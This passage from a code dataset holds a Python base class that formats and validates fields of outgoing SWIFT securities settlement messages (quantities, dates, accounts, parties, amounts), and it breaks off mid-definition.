status=status.HTTP_200_OK)\n\n\n\n\n\n","sub_path":"apps/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346071971","text":"\"\"\"----------------------------------------------------------------------------\nMODULE:\n FSecuritySettlementOutBase\n\nDESCRIPTION:\n This module provides the base class for the security settlement outgoing implementation.\n It contains the common mwthods across security settlement outgoing solution.\n\nCLASS:\n FSecuritySettlementOutBase\n\nVERSION: 3.0.0-0.5.3344\n\nRESTRICTIONS/LIMITATIONS:\n\t1. Any modifications to the script/encrypted module/clear text code within the core is not supported.\n\t2. This module is not customizable.\n\t3. 
The component may not work as expected with any modifications done to this module at user end.\n----------------------------------------------------------------------------\"\"\"\nfrom FMTOutBase import FMTOutBase\nimport FSwiftWriterUtils\nimport FSecuritySettlementOutUtils\nimport FSwiftWriterLogger\nimport FSwiftMLUtils\nimport acm\n\nnotifier = FSwiftWriterLogger.FSwiftWriterLogger('SecSetOut', 'FSecuritySettlementOutNotify_Config')\n\nclass FSecuritySettlementOutBase(FMTOutBase):\n def __init__(self, acm_obj, swift_obj, swift_metadata_xml_dom=None):\n super(FSecuritySettlementOutBase, self).__init__(acm_obj, swift_obj, swift_metadata_xml_dom)\n\n # ------------------ quantity of instrument-36B-----------------------\n\n def quantity_of_instrument_36B(self):\n '''\n Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v3,k2:v4}]\n '''\n if self.use_operations_xml:\n quantity_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'QUANTITY',\n ['QUANTITY_TYPE_CODE', 'QUANTITY_QUANTITY'])\n else:\n quantity = {}\n quantity_blocks = []\n quantity['QUANTITY_TYPE_CODE'] = FSecuritySettlementOutUtils.get_quantity_type_code()\n quantity['QUANTITY_QUANTITY'] = FSecuritySettlementOutUtils.get_quantity(self.acm_obj)\n quantity_blocks.append(quantity)\n return quantity_blocks\n\n def _format_quantity_of_instrument_36B(self, val):\n quantity_of_instrument = []\n for each_block in val:\n quantity_of_instrument.append(\":SETT//\" + str(each_block['QUANTITY_TYPE_CODE']) + \"/\" + str(\n each_block['QUANTITY_QUANTITY']).replace('.', ','))\n return quantity_of_instrument\n\n def _validate_quantity_of_instrument_36B(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n val = self._validate_quantity_of_instrument_36B_items(each_val)\n values.append(val)\n return values\n\n # ------------------ date time -98A-----------------------\n\n def get_settlement_datetime_98_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def date_time(self):\n '''\n Returns a list of dictionaries as [{'DateTime_A':{k1:v1,k2:v2}},{'DateTime_A':{k1:v3,k2:v4}}]\n '''\n val_list = []\n if self.use_operations_xml:\n settlement_datetime_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom,\n 'SETTLEMENT_DATETIME',\n ['SETTLEMENT_DATETIME_OPTION',\n 'SETTLEMENT_DATETIME_QUALIFIER',\n 'SETTLEMENT_DATETIME_DATE'])\n for each_block in settlement_datetime_blocks:\n val_dict = {}\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n else:\n val_dict = {}\n each_block = {}\n each_block['SETTLEMENT_DATETIME_OPTION'] = self.get_settlement_datetime_98_option()\n each_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_settlement_datetime_qualifier()\n each_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_settlement_datetime_date(self.acm_obj)\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n else:\n notifier.ERROR(\"%s Option %s is not supported for tag %s. 
Mapping default option: A\" %\n (self.swift_message_type, each_block['SETTLEMENT_DATETIME_OPTION'], 'SettlementDateTime_98a'))\n each_block['SETTLEMENT_DATETIME_OPTION'] = 'A'\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n\n val_dict = {}\n each_block = {}\n each_block['SETTLEMENT_DATETIME_OPTION'] = self.get_settlement_datetime_98_option()\n each_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_trade_datetime_qualifier()\n each_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_trade_datetime_date(self.acm_obj)\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_date_time(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'DateTime_A' in each_val:\n format_dict['DateTime_A'] = self._format_date_time_98A(each_val['DateTime_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_date_time(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'DateTime_A' in each_val:\n val = self._validate_date_time_98A(each_val['DateTime_A'])\n if val:\n valid_dict['DateTime_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ date time 98A -----------------------\n def date_time_98A(self, sett_datetime_dict):\n '''\n Returns a dictionary as {key1:value1, key2:value2}\n '''\n values_dict = {}\n date = sett_datetime_dict['SETTLEMENT_DATETIME_DATE']\n qualifier = sett_datetime_dict['SETTLEMENT_DATETIME_QUALIFIER']\n values_dict['date'] = date\n values_dict['qualifier'] = qualifier\n return values_dict\n\n def _format_date_time_98A(self, val):\n date = val.get('date')\n qualifier = val.get('qualifier')\n date_format = '%Y%m%d'\n yyyymmdd_date = FSwiftWriterUtils.format_date(date, date_format)\n val = \":\" + str(qualifier) + '//' + str(yyyymmdd_date)\n return val\n\n # ------------------ account -----------------------\n\n def get_account_97_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def account(self):\n '''\n Returns a list of dictionaries as [{'Account_A':{k1:v1}},{'Account_A':{k1:v2}}]\n '''\n val_list = []\n if self.use_operations_xml:\n account_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'ACCOUNT',\n ['ACCOUNT_OPTION', 'ACCOUNT_QUALIFIER', 'ACCOUNT_NUMBER'])\n for each_block in account_blocks:\n val_dict = {}\n if each_block and each_block['ACCOUNT_OPTION'] == 'A':\n val_dict['Account_A'] = self.account_97A(each_block)\n val_list.append(val_dict)\n else:\n val_dict = {}\n each_block = {}\n each_block['ACCOUNT_OPTION'] = self.get_account_97_option()\n each_block['ACCOUNT_QUALIFIER'] = FSecuritySettlementOutUtils.get_account_qualifier()\n each_block['ACCOUNT_NUMBER'] = FSecuritySettlementOutUtils.get_account_number(self.acm_obj)\n if each_block and each_block['ACCOUNT_OPTION'] not in ['A']:\n notifier.ERROR(\"%s Option %s is not supported for tag %s. 
Mapping default option: A\" %\n (self.swift_message_type, each_block['ACCOUNT_OPTION'], 'Account_97a'))\n each_block['ACCOUNT_OPTION'] = 'A'\n if each_block and each_block['ACCOUNT_OPTION'] == 'A':\n val_dict['Account_A'] = self.account_97A(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_account(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'Account_A' in each_val:\n format_dict['Account_A'] = self._format_account_97A(each_val['Account_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_account(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'Account_A' in each_val:\n val = self._validate_account_97A(each_val['Account_A'])\n if val:\n valid_dict['Account_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ account - 97A -----------------------\n def account_97A(self, account_dict):\n '''\n Returns a dictionary as {k1:v1, k2:v2}\n '''\n values_dict = {}\n qualifier = account_dict['ACCOUNT_QUALIFIER']\n number = account_dict['ACCOUNT_NUMBER']\n values_dict['qualifier'] = qualifier\n values_dict['number'] = number\n return values_dict\n\n def _format_account_97A(self, val):\n qualifier = val.get('qualifier')\n number = val.get('number')\n account_A = \":\" + str(qualifier) + \"//\" + str(number)\n return account_A\n\n # ------------------ function of message - 23G -----------------------\n\n def function_of_message_23G(self):\n '''\n Returns a string containing value of fuction_of_message\n '''\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n return function_of_message\n\n def _format_function_of_message_23G(self, val):\n return val\n\n # ------------------ place of safekeeping - 94F-----------------------\n\n def place_of_safekeeping(self):\n '''\n Returns a list of dictionaries as [{PlaceOfSafekeeping_F:{k1:v1,k2:v2}},{PlaceOfSafekeeping_F:{k1:v3,k2:v4}}]\n '''\n val_list = []\n if self.use_operations_xml:\n place_of_safekeeping_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom,\n 'PLACE_OF_SAFEKEEPING',\n ['PLACE_OF_SAFEKEEPING_OPTION',\n 'PLACE_OF_SAFEKEEPING_QUALIFIER',\n 'PLACE_OF_SAFEKEEPING_PLACE_CODE',\n 'PLACE_OF_SAFEKEEPING_IDENTIFIER_CODE'],\n ignore_absense=True)\n for each_block in place_of_safekeeping_blocks:\n val_dict = {}\n if each_block and each_block['PLACE_OF_SAFEKEEPING_OPTION'] == 'F':\n val_dict['PlaceOfSafekeeping_F'] = self.place_of_safekeeping_94F(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_place_of_safekeeping(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'PlaceOfSafekeeping_F' in each_val:\n format_dict['PlaceOfSafekeeping_F'] = self._format_place_of_safekeeping_94F(\n each_val['PlaceOfSafekeeping_F'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_place_of_safekeeping(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'PlaceOfSafekeeping_F' in each_val:\n val = self._validate_place_of_safekeeping_94F(each_val['PlaceOfSafekeeping_F'])\n if val:\n valid_dict['PlaceOfSafekeeping_F'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ place of safekeeping 94F -----------------------\n def 
place_of_safekeeping_94F(self, place_of_safekeeping_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_QUALIFIER']\n place_code = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_PLACE_CODE']\n identifier = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_IDENTIFIER_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['place_code'] = place_code\n values_dict['identifier'] = identifier\n return values_dict\n\n def _format_place_of_safekeeping_94F(self, val):\n qualifier = val.get('qualifier')\n place_code = val.get('place_code')\n identifier = val.get('identifier')\n place_of_safekeeping_F = str(qualifier) + \"//\" + \\\n str(place_code) + \"/\" + \\\n str(identifier)\n return place_of_safekeeping_F\n\n # ------------------ settlement parties -----------------------\n\n def get_party_95_option(self):\n \"\"\"Returns option override if implemented\n :return: str; option choice as string\n \"\"\"\n return 'P'\n\n def get_party_safekeeping_97_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def _format_settlement_parties(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'PARTY_P' in each_val:\n format_dict['PARTY_P'] = self._format_settlement_party_95P(each_val['PARTY_P'])\n if 'PARTY_C' in each_val:\n format_dict['PARTY_C'] = self._format_settlement_party_95C(each_val['PARTY_C'])\n if 'PARTY_Q' in each_val:\n format_dict['PARTY_Q'] = self._format_settlement_party_95Q(each_val['PARTY_Q'])\n if 'PARTY_R' in each_val:\n format_dict['PARTY_R'] = self._format_settlement_party_95R(each_val['PARTY_R'])\n if 'SafekeepingAccount_A' in each_val:\n format_dict['SafekeepingAccount_A'] = self._format_party_safekeeping_account_97A(\n each_val['SafekeepingAccount_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_settlement_parties(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'PARTY_P' in each_val:\n val = self._validate_settlement_party_95P(each_val['PARTY_P'])\n if val:\n valid_dict['PARTY_P'] = val\n if 'PARTY_C' in each_val:\n val = self._validate_settlement_party_95C(each_val['PARTY_C'])\n if val:\n valid_dict['PARTY_C'] = val\n if 'PARTY_Q' in each_val:\n val = self._validate_settlement_party_95Q(each_val['PARTY_Q'])\n if val:\n valid_dict['PARTY_Q'] = val\n if 'PARTY_R' in each_val:\n val = self._validate_settlement_party_95R(each_val['PARTY_R'])\n if val:\n valid_dict['PARTY_R'] = val\n if 'SafekeepingAccount_A' in each_val:\n val = self._validate_party_safekeeping_account_97A(each_val['SafekeepingAccount_A'])\n if val:\n valid_dict['SafekeepingAccount_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ settlement parties 95P -----------------------\n def settlement_party_95P(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n code = party_dict['PARTY_IDENTIFIER_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95P(self, val):\n qualifier = val.get('qualifier')\n code = val.get('code')\n if not code: # SPR 405530 in Prime, Prime > 2017.3 returns PARTY_IDENTIFIER_CODE in XML but < 2017.3 returns empty\n counter_party_account = self.acm_obj.CounterpartyAccountRef()\n if counter_party_account:\n code = 
FSwiftMLUtils.get_party_bic(counter_party_account)\n settlement_party_P = \":\" + str(qualifier) + \"//\" + str(code)\n return settlement_party_P\n\n # ------------------ settlement parties 95R -----------------------\n def settlement_party_95R(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n source_scheme = party_dict['PARTY_DATA_SOURCE_SCHEME']\n code = party_dict['PARTY_PROPRIETARY_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['source_scheme'] = source_scheme\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95R(self, val):\n qualifier = val.get('qualifier')\n source_scheme = val.get('source_scheme')\n code = val.get('code')\n settlement_party_R = \":\" + str(qualifier) + \"/\" + str(source_scheme) + \"/\" + str(code)\n return settlement_party_R\n\n # ------------------ settlement parties 95C -----------------------\n def settlement_party_95C(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n code = party_dict['PARTY_COUNTRY_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95C(self, val):\n qualifier = val.get('qualifier')\n code = val.get('code')\n settlement_party_C = \":\" + str(qualifier) + \"//\" + str(code)\n return settlement_party_C\n\n # ------------------ settlement parties 95Q -----------------------\n def settlement_party_95Q(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n name = party_dict['PARTY_NAME']\n address = party_dict['PARTY_ADDRESS']\n values_dict['qualifier'] = qualifier\n values_dict['name'] = name\n values_dict['address'] = address\n return values_dict\n\n def _format_settlement_party_95Q(self, val):\n qualifier = val.get('qualifier')\n name = val.get('name')\n address = val.get('address')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n settlement_party_Q = \":\" + str(qualifier) + \"//\" + val\n return settlement_party_Q\n\n # ------------------ party safekeeping account 97A -----------------------\n def party_safekeeping_account_97A(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_SAFEKEEPING_QUALIFIER']\n account = party_dict['PARTY_SAFEKEEPING_ACCOUNT']\n values_dict['qualifier'] = qualifier\n values_dict['account'] = account\n return values_dict\n\n def _format_party_safekeeping_account_97A(self, val):\n qualifier = val.get('qualifier')\n account = val.get('account')\n party_safekeeping_account_A = \":\" + str(qualifier) + \"//\" + str(account)\n return party_safekeeping_account_A\n\n # ------------------ indicator-22F -----------------------\n\n def indicator_22F(self):\n '''\n Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v3,k2:v4}]\n '''\n if self.use_operations_xml:\n indicator_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'INDICATOR',\n ['INDICATOR_QUALIFIER', 'INDICATOR_INDICATOR'])\n else:\n indicator_blocks = []\n indicators = FSecuritySettlementOutUtils.get_indicators(self.acm_obj)\n for indicator_pair in indicators:\n indicator_block = {}\n 
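The 95a party formatters above all reduce to ':QUALIFIER//value' (option P carries a BIC, option C a country code), with option R inserting a data-source scheme as ':QUALIFIER/SCHEME/value'. A standalone sketch of that shared shape; the qualifiers, BIC and scheme below are illustrative values only, not taken from the original.

def format_party_95a(qualifier, value, scheme=None):
    """Shared shape of the 95a options above."""
    if scheme:
        return ":%s/%s/%s" % (qualifier, scheme, value)   # option R
    return ":%s//%s" % (qualifier, value)                 # options P and C

assert format_party_95a("DEAG", "DEUTDEFF") == ":DEAG//DEUTDEFF"
assert format_party_95a("PSET", "XS", scheme="ABCD") == ":PSET/ABCD/XS"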
indicator_block['INDICATOR_QUALIFIER'] = FSecuritySettlementOutUtils.get_qualifier(indicator_pair)\n indicator_block['INDICATOR_INDICATOR'] = FSecuritySettlementOutUtils.get_indicator(indicator_pair)\n indicator_blocks.append(indicator_block)\n return indicator_blocks\n\n def _format_indicator_22F(self, val):\n indicator_values = []\n for each_block in val:\n indicator_values.append(\n \":\" + str(each_block['INDICATOR_QUALIFIER']) + \"//\" + str(each_block[\"INDICATOR_INDICATOR\"]))\n return indicator_values\n\n def _validate_indicator_22F(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n val = self._validate_indicator_22F_items(each_val)\n values.append(val)\n return values\n\n # ------------------ identification of financial instruments-35B-----------------------\n\n def identification_of_financial_ins_35B(self):\n '''\n Returns a dictionary as {key1:value1, key2:value2}\n '''\n values_dict = {}\n if self.use_operations_xml:\n isin = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'INSTRUMENT_ISIN'])\n description_of_security = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'DESCRIPTION_OF_SECURITY'],\n ignore_absense=True)\n values_dict['isin'] = isin\n values_dict['description_of_security'] = description_of_security\n else:\n values_dict['isin'] = FSecuritySettlementOutUtils.get_instrument_ISIN(self.acm_obj)\n values_dict['description_of_security'] = FSecuritySettlementOutUtils.get_description_of_security(self.acm_obj)\n return values_dict\n\n def _format_identification_of_financial_ins_35B(self, val):\n isin = val.get('isin')\n description_of_security = val.get('description_of_security')\n if description_of_security:\n lines = FSwiftWriterUtils.split_text_on_character_limit(description_of_security, 35)\n description_of_security = FSwiftWriterUtils.allocate_space_for_n_lines(4, lines)\n identification_of_financial_ins = str(isin) + \"\\n\" + str(description_of_security)\n else:\n identification_of_financial_ins = str(isin) + \"\\n\"\n return str(identification_of_financial_ins)\n\n # ------------------ linkage details -----------------------\n\n def linkages_20C_16R(self):\n '''\n Returns a dictionary as {key:value, key1:value1}\n '''\n values_dict = {}\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n linkage_qualifier = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'LINKAGE', 'LINKAGE_QUALIFIER'],\n ignore_absense=True)\n linkage_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'LINKAGE', 'LINKAGE_REFERENCE'],\n ignore_absense=True)\n senders_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SETTLEMENT', 'SEQNBR'])\n seq_ref = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'SEQREF'])\n\n values_dict['function_of_message'] = function_of_message\n values_dict['linkage_qualifier'] = linkage_qualifier\n values_dict['linkage_reference'] = linkage_reference\n values_dict['senders_reference'] = senders_reference\n values_dict['seq_ref'] = seq_ref\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n linkage_qualifier = FSecuritySettlementOutUtils.get_linkage_qualifier(self.acm_obj)\n linkage_reference = FSecuritySettlementOutUtils.get_linkage_reference(self.acm_obj)\n 
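The 35B formatter above caps the security description at four lines of 35 characters each. A standalone equivalent using textwrap; the ISIN and description are sample data, and the original relies on library helpers (split_text_on_character_limit, allocate_space_for_n_lines) not shown here.

import textwrap

def format_description_35B(isin, description, width=35, max_lines=4):
    # Wrap the free-text description to the field's line width, keep at
    # most max_lines lines, and prepend the ISIN line.
    lines = textwrap.wrap(description, width=width)[:max_lines]
    return "\n".join([isin] + lines)

print(format_description_35B(
    "ISIN US0378331005",
    "APPLE INC COMMON STOCK USD0.00001 PAR VALUE"))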
values_dict['function_of_message'] = function_of_message\n values_dict['linkage_qualifier'] = linkage_qualifier\n values_dict['linkage_reference'] = linkage_reference\n values_dict['senders_reference'] = self.acm_obj.Oid()\n values_dict['seq_ref'] = FSecuritySettlementOutUtils.get_settlement_reference_prefix()\n return values_dict\n\n def _check_condition_set_linkages_20C_16R(self):\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n if function_of_message == \"CANC\":\n return True\n return False\n\n # ------------------- senders reference - 20C-------------------\n\n def senders_message_reference_20C(self):\n '''\n Returns a dictionary as {'senders_reference':value1, 'seq_ref':value2}\n '''\n values_dict = {}\n if self.use_operations_xml:\n senders_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SETTLEMENT', 'SEQNBR'])\n seq_ref = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'SEQREF'])\n values_dict['senders_reference'] = senders_reference\n values_dict['seq_ref'] = seq_ref\n else:\n values_dict = {}\n values_dict['senders_reference'] = self.acm_obj.Oid()\n values_dict['seq_ref'] = FSecuritySettlementOutUtils.get_settlement_reference_prefix()\n return values_dict\n\n def _format_senders_message_reference_20C(self, val):\n senders_reference = val.get('senders_reference')\n seq_ref = val.get('seq_ref')\n sett_obj = acm.FSettlement[str(senders_reference)]\n if senders_reference:\n val = \":SEME//%s-%s-%s\" % (\n str(seq_ref), str(senders_reference), str(FSecuritySettlementOutUtils.get_message_version_number(sett_obj)))\n return str(val)\n\n # ------------------ amounts block -----------------------\n\n # block getter\n def amounts(self):\n \"\"\" Returns a dictionary as [{'AMOUNT_BLOCKS': [list_of _dict_of amounts], 'FLAG_BLOCKS': [list_of_dict_of_flags]}]\n \"\"\"\n amounts_block_details = dict()\n amounts_block_details['AMOUNT_BLOCKS'] = self.amount_19A()\n amounts_block_details['FLAG_BLOCKS'] = self.flag_17B()\n\n return amounts_block_details\n\n def _format_amounts(self, val_dict):\n \"\"\"Format amounts block\"\"\"\n amounts_block = dict()\n\n amounts_block['AMOUNT_BLOCKS'] = self._format_amounts_19A(val_dict.get('AMOUNT_BLOCKS'))\n amounts_block['FLAG_BLOCKS'] = self._format_flag_17B(val_dict.get('FLAG_BLOCKS'))\n return amounts_block\n\n def _validate_amounts(self, val_dict):\n \"\"\" Validate amount block fields\"\"\"\n val_dict['AMOUNT_BLOCKS'] = self._validate_amount_list_19A(val_dict.get('AMOUNT_BLOCKS'))\n val_dict['FLAG_BLOCKS'] = self._validate_flag_list_17B(val_dict.get('FLAG_BLOCKS'))\n return val_dict\n\n\n def amount_19A(self):\n \"\"\"Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v1,k2:v2}]\"\"\"\n if self.use_operations_xml:\n amount_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'AMOUNT',\n ['AMOUNT_QUALIFIER', 'AMOUNT_SIGN',\n 'AMOUNT_CURRENCY_CODE',\n 'AMOUNT_AMOUNT'])\n else:\n amount_blocks = FSecuritySettlementOutUtils.get_amount_details(self.acm_obj, self.swift_message_type)\n\n return amount_blocks\n\n def flag_17B(self):\n \"\"\"get the settlement amount flag\"\"\"\n flag_blocks = FSecuritySettlementOutUtils.get_amount_flags(self.acm_obj, self.swift_message_type)\n return flag_blocks\n\n def _format_amounts_19A(self, val):\n amount_fields = list()\n 
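Several formatters in this class (36B quantities, 19A amounts) share one SWIFT convention: colon, qualifier, '//', then the value with a comma as the decimal separator, which is exactly the str(...).replace('.', ',') seen above. A minimal standalone sketch with an illustrative qualifier and values:

def format_swift_amount(qualifier, currency, amount):
    """Render e.g. ':SETT//EUR10000,5'; SWIFT fields use ',' as decimal mark."""
    return ":" + qualifier + "//" + currency + str(amount).replace('.', ',')

assert format_swift_amount("SETT", "EUR", 10000.5) == ":SETT//EUR10000,5"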
for each_block in val:\n amount_field = \":\" + str(each_block['AMOUNT_QUALIFIER']) + \"//\" + str(each_block[\"AMOUNT_CURRENCY_CODE\"])\\\n + str(each_block[\"AMOUNT_AMOUNT\"]).replace('.', ',')\n\n amount_fields.append(amount_field)\n return amount_fields\n\n def _format_flag_17B(self, val):\n flag_fields = list()\n for each_block in val:\n flag_field = \":\" + str(each_block[\"QUALIFIER\"]) + \"//\" + str(each_block[\"FLAG\"])\n flag_fields.append(flag_field)\n return flag_fields\n\n\n def _validate_amount_list_19A(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n self._validate_amounts_19A(each_val)\n values.append(each_val)\n return values\n\n def _validate_flag_list_17B(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n self._validate_flag_17B(each_val)\n values.append(each_val)\n return values\n\n\n # ------------------ SubSequence B1 date time - 98A -----------------------\n\n def subsequenceb1_date_time(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and Date\"\"\"\n date_time_list = []\n date_time_dict = {}\n date_time_block = {}\n date_time_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_maturity_datetime_qualifier()\n date_time_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_maturity_datetime_date(self.acm_obj)\n date_time_dict['DateTime'] = self.subsequenceb1_date_time_98A(date_time_block)\n date_time_list.append(date_time_dict)\n\n date_time_dict = {}\n date_time_block = {}\n date_time_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_issue_datetime_qualifier()\n date_time_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_issue_datetime_date(self.acm_obj)\n date_time_dict['DateTime'] = self.subsequenceb1_date_time_98A(date_time_block)\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _format_subsequenceb1_date_time(self, date_time_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n date_time_list = []\n for each_val in date_time_values:\n date_time_dict = {}\n if 'DateTime' in each_val:\n date_time_dict['DateTime'] = self._format_subsequenceb1_date_time_98A(each_val['DateTime'])\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _validate_subsequenceb1_date_time(self, date_time_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n date_time_list = []\n for each_val in date_time_values:\n date_time_dict = {}\n if 'DateTime' in each_val:\n val = self._validate_subsequenceb1_date_time_98A(each_val['DateTime'])\n if val:\n date_time_dict['DateTime'] = val\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _check_condition_set_subsequenceb1_date_time(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_subsequenceb1_date_time(self, date_time_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in date_time_values:\n if 'DateTime' in each_val:\n self._setsubsequenceb1date_time_98A(each_val['DateTime'])\n\n def subsequenceb1_date_time_98A(self, sett_datetime_dict):\n \"\"\"Returns a dictionary with values of Qualifier and Date\"\"\"\n date_time_dict = {}\n date = sett_datetime_dict['SETTLEMENT_DATETIME_DATE']\n qualifier = sett_datetime_dict['SETTLEMENT_DATETIME_QUALIFIER']\n date_time_dict['date'] = date\n date_time_dict['qualifier'] = qualifier\n return date_time_dict\n\n def 
